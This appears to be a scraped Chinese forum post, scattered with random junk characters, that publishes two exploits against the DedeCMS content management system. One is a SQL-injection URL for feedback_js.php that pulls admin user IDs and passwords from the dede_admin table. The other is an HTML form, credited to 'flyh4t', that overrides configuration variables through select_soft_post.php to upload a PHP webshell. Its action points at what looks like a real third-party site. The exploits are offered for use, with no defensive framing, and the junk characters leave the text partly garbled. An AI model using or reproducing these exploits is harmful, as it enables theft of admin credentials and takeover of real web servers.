: G' x7 r2 G. e ( z: ~1 _: c. ?8 u6 c+ ] ! _. a0 ~, o2 S; g& A5 x& j# s8 X
6 y* S" N. f+ J# x* V
7 K; e: P$ q( o% k6 D$ g* x# n8 Q
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞# V# o: i& V8 ~2 P; ^# v
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=' " Q: l$ Y4 {, I4 H # p. E. X' ~7 v, E% l! n& p' q- ]% K. W" Q: d3 U; N" i& Y
+ b5 t$ W" x; M3 j; B. v( H& U
6 j2 N5 e. M- x4 N
! k5 h: _. T; u+ _! _- B. X0 q0 S2 H/ i# C3 C+ V
$ F* n) s, |1 [. m) o9 T3 m * z/ O, r7 O- F% ~( \1 v2 v- t- k3 a3 M' M
W, t9 D& x5 F* z p' R% k
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞 5 t+ i/ C+ u: G- l<html> / t$ D v9 _( B+ M- M4 q" t: ?<head> 4 c2 |3 Q/ [6 m8 |9 R<title>Dedecms v55 RCE Exploit Codz By flyh4t</title> T) |5 K4 ~4 u9 [3 b
</head> 3 W5 h* V5 D g1 t<body style="FONT-SIZE: 9pt"> ! y+ |( L: ?9 S% m( z7 F---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />3 x- _( ]6 W; q/ n' t. ?1 W9 S9 r
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>7 S9 |$ b4 M' G7 |- b
<input type='hidden' name='activepath' value='/data/cache/' /> % y7 o: U( Q& h8 y! U2 @3 f3 y<input type='hidden' name='cfg_basedir' value='../../' /> 2 u2 j; f9 W: Q9 Q+ E<input type='hidden' name='cfg_imgtype' value='php' />4 ]: m3 G9 R* T( B, y+ u
<input type='hidden' name='cfg_not_allowall' value='txt' />$ G/ y$ _2 A) D& {% s- ?" w
<input type='hidden' name='cfg_softtype' value='php' />3 h/ Q; t! n4 u3 `3 H3 E: q
<input type='hidden' name='cfg_mediatype' value='php' />& H% P. ^* V# b( n7 q
<input type='hidden' name='f' value='form1.enclosure' /> 1 E$ o: i3 o( h c<input type='hidden' name='job' value='upload' /> 2 t/ h3 q7 d% D7 ]; |<input type='hidden' name='newname' value='fly.php' /> % ?% O+ ^1 S) e& f6 d, y( D& BSelect U Shell <input type='file' name='uploadfile' size='25' /> . l. R" S) ]3 {4 T* I<input type='submit' name='sb1' value='确定' /> 0 B2 S4 }' R1 z/ i$ w4 D5 N- x0 Z</form>! ]. ^$ M% H* ]% e$ M9 b
<br />It's just a exp for the bug of Dedecms V55...<br /> 0 p2 F- p6 w* i+ Y6 v2 m& WNeed register_globals = on...<br /> - X' ~# V7 i% ?- u5 x; K- n4 }+ jFun the game,get a webshell at /data/cache/fly.php...<br />: u( X" A4 g) F; Q
</body>0 O5 ~1 H( P: s0 \7 i
</html> 5 W3 j6 g) f$ i! h % A7 y" E, S* ]2 ]3 P& _7 _1 C1 W( W. [; ]